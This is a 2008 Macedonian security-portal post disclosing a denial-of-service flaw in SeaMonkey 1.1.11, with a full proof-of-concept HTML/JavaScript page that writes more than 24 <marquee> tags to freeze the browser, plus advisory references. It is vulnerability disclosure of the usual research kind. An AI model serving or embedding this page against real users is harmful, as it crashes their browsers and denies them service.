IT.com.mk - Македонски ИТ портал - SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Автор: Ѓоко Крстиќ
Објавено на: 09.09.2008
SeaMonkey 1.1.11 (Mozilla) е ранлив на DoS напад со помош на пренатрупување на тагот <marquee> повеќе од 24 пати во html кодот. Успешна експлоатација доведува до замрзнување на апликацијата и недостапност на истата. Следува доказ на концептот: --------------------------------------------------------------код-------------------------------------------------------------- <!-- Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC Summary: Web-browser, advanced e-mail and newsgroup client, IRC chat client, and HTML editing made simple - all your Internet needs in one application. Product web page: http://www.seamonkey-project.org/ Desc: SeaMonkey suffers from a remote denial of service vulnerability (DoS), using a special html file with the <marquee> tag multiple times (>24). Successfully exploiting these issues allows remote attackers to cause the application to freeze, denying service to legitimate users. Tested on Microsoft Windows XP SP2 (English) Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 08.09.2008 --> <html> <title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title> <head> <body> <br /><br /><br /><br /> <br /><br /><br /><br /> <br /><br /><br /><br /> <center> <script type="text/javascript"> document.write("<kbd>Wooow Camel..!! WOW!</kbd>"); function t00t() { for(i=0; i < 25; i++) { document.write("<marquee>"); } } alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit"); var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation"); if (b0x == true) { t00t(); } else { alert("Allrighty Then!"); window.location.href = "http://www.disneyland.com"; } </script> </center> </body> </head> </html> --------------------------------------------------------------код-------------------------------------------------------------- Референти: - http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html - http://www.securityfocus.com/bid/31070 - http://www.zeroscience.org/codes/seamonkey_dos.txt Тест: ТУКА (со внимание!) Клучни зборови: SeaMonkey 1.1.11 Mozilla DoS Експлоатација JavaScript HTML marquee Код веб прелистувач

Сподели:

Последни написи на Ѓоко

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

SEAT
објавено на 15.03.2009 во Сигурност

w3af - Конструкција за Напад и Ревизија на Веб Апликации
објавено на 03.03.2009 во Сигурност

Secunia - Сигурносен извештај за 2008 година
објавено на 27.02.2009 во Сигурност

Facebook > Pоrn

Во Октомври 2007 година, магазинот Time и официјално прогласи дека друштвените сајтови на интернет се по популарни од сајтовите со порнографски содржини.

Тркалезна маса за активно граѓанско учество
Во рамките на Проектот за децентрализиран...
07.07.2009

WebFest: Најдобри регионални проекти
WebFest е првиот регионален фестивал кој има �...
15.09.2009

biZbuZZ 2009
Од 28-30 Октомври, 2009 во хотелот "Видиковац" в...
28.10.2009